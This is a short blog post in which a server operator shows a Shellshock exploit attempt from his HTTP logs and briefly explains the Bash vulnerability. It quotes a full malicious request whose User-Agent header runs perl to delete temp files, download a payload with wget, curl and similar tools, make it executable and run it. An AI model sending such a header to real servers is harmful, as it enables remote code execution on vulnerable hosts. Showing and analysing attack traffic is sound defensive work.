How a Shellshock exploit attempt looks like

One of my HTTP servers hosted on an Amazon EC2 receives regularly strange requests like these:   One such request looks like this: GET /cgi-bin/php5 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget ; curl -O ; fetch ; lwp-download; chmod +x .c.txt* ; sh .c.txt* “);’ Host: Connection: Close   The IP address in the screen shot is from Austria ( I received similar requests from the Netherlands, France and UK. Unfortunately, I configured the HTTP server to erase old logs, so I can’t say how many access I got and from which locations. This is a variant of the Shellshock exploit discovered in September last year. How do you know that this is the Shellshock exploit? By seeing this text: User-Agent: () { :;};/usr/bin/perl -e   The Shellshock vulnerabilities affect Bash, a program that various Unix-based systems use to execute command lines and command scripts. It is often installed as the system’s default command-line interface. Bash is free software, developed collaboratively and overseen since 1992 on a volunteer basis by Chet Ramey, a professional software architect. Analysis of the…

%d bloggers like this: